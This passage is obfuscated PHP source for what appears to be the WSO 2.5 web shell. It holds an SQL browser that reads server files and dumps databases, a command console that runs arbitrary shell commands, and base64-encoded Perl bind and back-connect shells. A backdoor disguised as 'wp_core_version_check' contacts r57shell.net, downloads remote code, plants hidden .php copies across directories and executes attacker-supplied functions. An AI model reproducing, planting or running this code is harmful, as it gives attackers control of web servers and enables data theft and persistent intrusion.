                    if(f.p1) f.p1.value='';\xd
                    if(f.p2) f.p2.value='';\xd\xa                    if(f.p3) f.p3.value='';\xd\xa                }
\xa            }\xd
\x9	\x9function st(t,l) {
\xa\x9\x9	\x9d.sf.p1.value = 'select';\xd
	\x9\x9	d.sf.p2.value = t;
\xa                if(l && d.sf.p3) d.sf.p3.value = l;\xd
				d.sf.submit();
			}
	\x9\x9function is() {\xd\xa	\x9\x9	for(i=0;i<d.sf.elements['tbl[]'].length;++i)\xd\xa\x9\x9		\x9d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\xd\xa\x9\x9	}\xd\xa	\x9</script>"; goto omuNC; omuNC: if (isset($db) && $db->link) { goto wQooQ; v7m0f: if (!empty($_POST["sql_base"])) { goto Rgzyg; MvXdD: if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { goto p5kAe; FQZVM: while ($item = $db->fetch()) { if (!$title) { goto UHBlV; UHBlV: echo "<tr>"; goto hcvnp; krRoK: $line = 2; goto OQDWZ; hcvnp: foreach ($item as $key => $value) { echo "<th>" . $key . "</th>"; } goto gYEfe; s133J: $title = true; goto vdCQU; vdCQU: echo "</tr><tr>"; goto krRoK; gYEfe: reset($item); goto s133J; OQDWZ: } echo "<tr class="l" . $line . "">"; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "<td><i>null</i></td>"; } else { echo "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } echo "</tr>"; } goto LonsA; c36CC: $line = 1; goto FQZVM; LonsA: echo "</table>"; goto zCgso; vhOW_: echo "<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">"; goto c36CC; p5kAe: $title = false; goto vhOW_; zCgso: } else { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } } goto f63uD; f63uD: echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; goto l03yb; Rgzyg: $db->selectdb($_POST["sql_base"]); goto QW0Ku; uEPKu: if (@$_POST["p1"] == "select") { goto mAhBO; IznKf: if ($_POST["p3"] > 1) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>&lt; Prev</a>"; } goto ZoHo3; l2Xna: $pages = ceil($num["n"] / 30); goto ZYT4s; mAhBO: $_POST["p1"] = "query"; goto e_ZJ4; ZYT4s: echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; goto uoZpe; Es7M3: $num = $db->fetch(); goto l2Xna; uoZpe: echo " of {$pages}"; goto IznKf; rczWG: $_POST["p3"]--; goto bhg9h; e_ZJ4: $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; goto Lo_J9; nEjUO: echo "<br><br>"; goto IQ9di; bhg9h: if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } goto nEjUO; Lo_J9: $db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]); goto Es7M3; ZoHo3: if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next &gt;</a>"; } goto rczWG; IQ9di: } goto MvXdD; EHE8j: echo "</textarea><br/><input type=submit value='Execute'>"; goto epF3V; bDaxO: while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? "&nbsp;" : " <small>({$n["n"]})</small>") . "</nobr><br>"; } goto M5p5r; l03yb: if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } goto EHE8j; M5p5r: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto uEPKu; QW0Ku: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto ss2k2; epF3V: echo "</td></tr>"; goto DdhHe; ss2k2: $tbls_res = $db->listTables(); goto bDaxO; DdhHe: } goto E6Jlf; E6Jlf: echo "</table></form><br/>"; goto eqSj_; HfqGV: if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "<br/><pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } goto OSIXi; eqSj_: if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } goto HfqGV; wQooQ: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto v7m0f; OSIXi: } else { echo htmlspecialchars($db->error()); } goto qgUXu; eZaK7: echo "\xd
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\xd\xa<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xd\xa<td><select name='type'><option value='mysql' "; goto XNXvh; L_VIT: if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { goto zzoGT; zzoGT: switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } goto CgrPi; hq4SA: echo "</select>"; goto pJJmI; CgrPi: $db->listDbs(); goto KKbSG; MV0Hw: while ($item = $db->fetch()) { list($key, $value) = each($item); echo "<option value="" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . ">" . $value . "</option>"; } goto hq4SA; KKbSG: echo "<select name=sql_base><option value=''></option>"; goto MV0Hw; pJJmI: } else { echo $tmp; } } else { echo $tmp; } goto Auorx; pXyEP: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) { return true; } break; case "pgsql": goto urMgZ; NmhxL: if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } goto q24c2; q24c2: break; goto pMERe; urMgZ: $host = explode(":", $host); goto dzuNv; dzuNv: if (!$host[1]) { $host[1] = 5432; } goto NmhxL; pMERe: } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysqli_select_db($this->link, $db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysqli_query($this->link, $str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { goto ndkAm; Ccrqd: return false; goto kFQe3; ndkAm: $res = func_num_args() ? func_get_arg(0) : $this->res; goto uBsjP; uBsjP: switch ($this->type) { case "mysql": return @mysqli_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } goto Ccrqd; kFQe3: } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysqli_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql,_set_charset")) { return @mysqli_set_charset($str, $this->link); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": goto hIi1_; hIi1_: $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;"); goto Vq5gq; RFQO1: return array("file" => implode("
", $r)); goto Xccn3; Vq5gq: $r = array(); goto B2PD8; B2PD8: while ($i = $this->fetch()) { $r[] = $i["file"]; } goto ytmal; ytmal: $this->query("drop table wso2"); goto RFQO1; Xccn3: break; goto hza_Y; hza_Y: } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": goto A8Rtf; XOdpv: $i = 0; goto nXX1H; dgmAw: if (!$head) { if ($fp) { fwrite($fp, ";

"); } else { echo ";\xa
"; } } goto xuWj3; nXX1H: $head = true; goto rdh_q; vLJ0E: $sql = $create[1] . ";\xa"; goto GZCGH; e85gZ: $this->query("SELECT * FROM `" . $table . "`"); goto XOdpv; A8Rtf: $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); goto WbvCG; rdh_q: while ($item = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = ";\xa\xa"; } $columns = array(); foreach ($item as $k => $v) { if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysqli_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES 
	(" . implode(", ", $item) . ")"; $head = false; } else { $sql .= "\xa	,(" . implode(", ", $item) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } goto dgmAw; xuWj3: break; goto I2Pib; WbvCG: $create = mysqli_fetch_array($res); goto vLJ0E; GZCGH: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto e85gZ; I2Pib: case "pgsql": goto yK1Fh; q4AGJ: break; goto M_aLo; YU12f: while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $item) . ");" . "
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } goto q4AGJ; yK1Fh: $this->query("SELECT * FROM " . $table); goto YU12f; M_aLo: } return false; } } goto S2jsy; nON0D: wsoHeader(); goto eZaK7; S2jsy: $db = new DbClass($_POST["type"]); goto b5FFe; xAAjI: echo ">MySql</option><option value='pgsql' "; goto WqMW0; b5FFe: if (@$_POST["p2"] == "download") { goto q3uCo; dKSpy: switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } goto SW_1d; SW_1d: if (empty($_POST["file"])) { goto UlEph; NKAxm: foreach ($_POST["tbl"] as $v) { $db->dump($v); } goto gTeuJ; UlEph: ob_start("ob_gzhandler", 4096); goto wxi0r; wxi0r: header("Content-Disposition: attachment; filename=dump.sql"); goto JFnky; gTeuJ: exit; goto o3LDH; JFnky: header("Content-Type: text/plain"); goto NKAxm; o3LDH: } elseif ($fp = @fopen($_POST["file"], "w")) { goto HVjKn; sI6XB: fclose($fp); goto JcIQa; JcIQa: unset($_POST["p2"]); goto eJ6NS; HVjKn: foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } goto sI6XB; eJ6NS: } else { die("<script>alert("Error! Can't open file");window.history.back(-1)</script>"); } goto V4cuJ; q3uCo: $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); goto G1BTq; G1BTq: $db->selectdb($_POST["sql_base"]); goto dKSpy; V4cuJ: } goto nON0D; XNXvh: if (@$_POST["type"] == "mysql") { echo "selected"; } goto xAAjI; gsteZ: } goto BTyYB; M9YJl: $_POST = WSOstripslashes($_POST); goto ocXfq; BTyYB: function actionNetwork() { goto ZoVmx; unkZP: $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; goto PvgFx; y9LP4: if (isset($_POST["p1"])) { goto oL5si; oL5si: function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto O2j7_; O2j7_: if ($_POST["p1"] == "bpp") { goto OF3WF; SvfsQ: unlink("/tmp/bp.pl"); goto zB2bw; l42lD: sleep(1); goto YdT1I; YdT1I: echo "<pre class=ml1>{$out}
" . wsoEx("ps aux | grep bp.pl") . "</pre>"; goto SvfsQ; P3N6B: $out = wsoEx("perl /tmp/bp.pl " . $_POST["p2"] . " 1>/dev/null 2>&1 &"); goto l42lD; OF3WF: cf("/tmp/bp.pl", $bind_port_p); goto P3N6B; zB2bw: } goto mmghY; mmghY: if ($_POST["p1"] == "bcp") { goto KdsjF; EYep1: unlink("/tmp/bc.pl"); goto vnHPj; cueL2: sleep(1); goto rbk8c; rbk8c: echo "<pre class=ml1>{$out}
" . wsoEx("ps aux | grep bc.pl") . "</pre>"; goto EYep1; KdsjF: cf("/tmp/bc.pl", $back_connect_p); goto JIcLb; JIcLb: $out = wsoEx("perl /tmp/bc.pl " . $_POST["p2"] . " " . $_POST["p3"] . " 1>/dev/null 2>&1 &"); goto cueL2; vnHPj: } goto HmOsb; HmOsb: } goto JZOTa; QtVUX: wsoFooter(); goto r_ZsG; ZoVmx: wsoHeader(); goto ui6gf; PvgFx: echo "<h1>Network tools</h1><div class=content>\xd
	<form name='nfp' onSubmit="g(null,null,'bpp',this.port.value);return false;">\xd\xa\x9<span>Bind port to /bin/sh [perl]</span><br/>
\xa	Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\xd
\x9</form>\xd\xa	<form name='nfp' onSubmit="g(null,null,'bcp',this.server.value,this.port.value);return false;">\xd\xa\x9<span>Back-connect  [perl]</span><br/>
	Server: <input type='text' name='server' value='" . $_SERVER["REMOTE_ADDR"] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
\x9</form><br>"; goto y9LP4; JZOTa: echo "</div>"; goto QtVUX; ui6gf: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto unkZP; r_ZsG: } goto B8b3D; ABTpd: @ini_set("max_execution_time", 0); goto V8rDW; LNmAT: $default_action = "FilesMan"; goto uf2tU; hd5Oa: @define("WSO_VERSION", "2.5"); goto XWpnO; w2GF1: function actionConsole() { goto rclMD; fIAZm: if (isset($_POST["ajax"])) { goto b0kHG; UVP1d: exit; goto FfbZi; k7CDe: echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto X7NDa; nIuhp: if (preg_match("!.*cd\s+([^;]+)$!", $_POST["p1"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } goto VTnj_; LPhSs: $temp = @iconv($_POST["charset"], "UTF-8", addcslashes("\xa$ " . $_POST["p1"] . "\xa" . wsoEx($_POST["p1"]), "\xa\xd\x9\'\x0")); goto nIuhp; y6Hrb: echo "d.cf.cmd.value='';
"; goto LPhSs; wcz4k: ob_start(); goto y6Hrb; VTnj_: echo "d.cf.output.value+='" . $temp . "';"; goto k7CDe; jyokt: echo strlen($temp), "
", $temp; goto UVP1d; b0kHG: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto wcz4k; X7NDa: $temp = ob_get_clean(); goto jyokt; FfbZi: } goto KpSEA; RZ79V: echo "</form></div><script>d.cf.cmd.focus();</script>"; goto SJHUc; f8SjV: echo "</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["p2"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : '') . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>"; goto IWzV6; SJHUc: wsoFooter(); goto APwh_; nacH0: echo "</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>"; goto RZ79V; qs3Ch: echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><select name=alias>"; goto qrzII; IWzV6: if (!empty($_POST["p1"])) { echo htmlspecialchars("$ " . $_POST["p1"] . "
" . wsoEx($_POST["p1"])); } goto nacH0; c_48E: echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');\xd
var cur = 0;\xd\xafunction kp(e) {
\xa	var n = (window.Event) ? e.which : e.keyCode;
\xa\x9if(n == 38) {\xd
	\x9cur--;\xd
\x9\x9if(cur>=0)\xd
		\x9document.cf.cmd.value = cmds[cur];\xd\xa	\x9else
\x9\x9	cur++;
\xa\x9} else if(n == 40) {
\xa		cur++;\xd\xa\x9	if(cur < cmds.length)\xd
			document.cf.cmd.value = cmds[cur];\xd
\x9\x9else
\x9		cur--;
\xa	}\xd\xa}
\xafunction add(cmd) {\xd
\x9cmds.pop();
\x9cmds.push(cmd);
\xa	cmds.push('');
	cur = cmds.length-1;\xd\xa}\xd\xa</script>"; goto qs3Ch; qrzII: foreach ($GLOBALS["aliases"] as $n => $v) { if ($v == '') { echo "<optgroup label="-" . htmlspecialchars($n) . "-"></optgroup>"; continue; } echo "<option value="" . htmlspecialchars($v) . "">" . $n . "</option>"; } goto f8SjV; KpSEA: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto dwgoJ; dwgoJ: wsoHeader(); goto c_48E; rclMD: if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0); } goto fIAZm; APwh_: } goto rTVjF; XWpnO: if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto avUWa; wkmQ0: $uri_path = dirname($uri_path); goto s730R; vOWZG: $uri_path = $parse_url["path"]; goto wkmQ0; sM0UF: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto vbq6x; rs5dk: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto bu9lX; toU7p: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto sM0UF; vbq6x: if (@$_GET["slince_golden"]) { goto TmOVZ; UCuri: if (function_exists("curl_init")) { goto BJyTL; vyR_l: curl_close($ch); goto SHblm; hYCm_: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VE1SX; VE1SX: $response = curl_exec($ch); goto vyR_l; i0bPI: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto hYCm_; BJyTL: $ch = curl_init(); goto i0bPI; SHblm: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto kmEj4; TmOVZ: echo "<!-- //Silence is golden. -->"; goto UCuri; kmEj4: if (md5(sha1(@$_GET["is"])) == $response) { goto kgaYa; pHtWV: if (@$_POST["l"]) { function basic_code_extensions($request) { goto Wqe1_; q3A5w: $tmpf = stream_get_meta_data($tmp); goto gYkau; DzU1V: fclose($tmp); goto i26c2; uYFTY: $ret = (include $tmpf); goto DzU1V; dzD32: fwrite($tmp, $request); goto uYFTY; Wqe1_: $tmp = tmpfile(); goto q3A5w; i26c2: return $ret; goto An9L2; gYkau: $tmpf = $tmpf["uri"]; goto dzD32; An9L2: } print_r(basic_code_extensions($_POST["l"])); } goto fi0K3; FBXXk: if (@$_GET["m"]) { goto pvkox; ANUJn: echo $file_name_path; goto svCvU; ZI_cL: @file_put_contents($file_name_path, $response); goto ANUJn; pvkox: if (function_exists("curl_init")) { goto QH3uY; hFb2E: $response = curl_exec($ch); goto Qk97j; j__CW: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto S9Uoo; Qk97j: curl_close($ch); goto eMk6h; QH3uY: $ch = curl_init(); goto j__CW; S9Uoo: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto hFb2E; eMk6h: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto X5MJi; X5MJi: $file_name_path = @$_GET["m"] . "gagal.php"; goto ZI_cL; svCvU: } goto pHtWV; kgaYa: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto FBXXk; fi0K3: } goto d_oge; d_oge: exit; goto fDMzx; fDMzx: } goto gHtz2; fqAaN: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto SO8pY; SO8pY: foreach ($dirs as $d) { goto Scp89; cQFnr: @file_put_contents($file_name, $response); goto cQiiG; Scp89: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto cQFnr; IlPtg: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); } } goto u66S4; cQiiG: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto IlPtg; u66S4: } goto Q6DRk; bu9lX: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto toU7p; gHtz2: if (!file_exists($tmp_file)) { goto f_kq1; QKlrR: @file_put_contents($tmp_file, $response); goto Ul3cm; f_kq1: if (function_exists("curl_init")) { goto A1VWF; J1jm0: curl_close($ch); goto p2Bti; dYLi3: $response = curl_exec($ch); goto J1jm0; sjN5S: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto nQ3kj; A1VWF: $ch = curl_init(); goto LvoXB; LvoXB: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto sjN5S; nQ3kj: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto dYLi3; p2Bti: } else { goto aeiKy; aeiKy: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto XFWPB; Qt92G: $context = stream_context_create($opts); goto mtDkU; XFWPB: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto Qt92G; mtDkU: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto jDy5x; jDy5x: } goto NFiUK; NFiUK: @touch($tmp_file); goto QKlrR; Ul3cm: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto KzbMt; HV6vx: @touch($tmp_file); goto pdkVa; KzbMt: if (function_exists("curl_init")) { goto eMsto; LO0re: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto k5X0p; HJ7kx: curl_close($ch); goto gjzj0; j4CQT: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto LO0re; CssGj: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto j4CQT; k5X0p: $response = curl_exec($ch); goto HJ7kx; eMsto: $ch = curl_init(); goto CssGj; gjzj0: } else { goto GK4cX; a3V7j: $opts = array("http" => array("header" => array("Referer: {$referer}\xd\xa"))); goto v8ndl; GK4cX: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto a3V7j; rOcio: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto nx629; v8ndl: $context = stream_context_create($opts); goto rOcio; nx629: } goto HV6vx; pdkVa: @file_put_contents($tmp_file, $response); goto mecCz; mecCz: } } goto fqAaN; avUWa: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto tIPJm; CD9KV: $parse_url = parse_url($request_uri); goto vOWZG; tIPJm: $request_uri = $_SERVER["REQUEST_URI"]; goto CD9KV; s730R: $file_path = dirname($document_file); goto rs5dk; Q6DRk: } wp_core_version_check(); } goto SG2I5; cUzsD: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto qljle; oE6Ue: $home_cwd = @getcwd(); goto qZOco; eRZM6: function wsoPermsColor($f) { if (!@is_readable($f)) { return "<font color=#FF0000>" . wsoPerms(@fileperms($f)) . "</font>"; } elseif (!@is_writable($f)) { return "<font color=white>" . wsoPerms(@fileperms($f)) . "</font>"; } else { return "<font color=#25ff00>" . wsoPerms(@fileperms($f)) . "</font>"; } } goto guAyk; HhMRL: function actionSecInfo() { goto wqp98; qT_UQ: wsoSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); goto zEzgM; oKr71: if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } goto owg70; giF29: wsoSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); goto V6Pow; o51U2: wsoSecParam("Open base dir", @ini_get("open_basedir")); goto giF29; m3Zin: wsoSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); goto o51U2; owg70: if (function_exists("oci_connect")) { 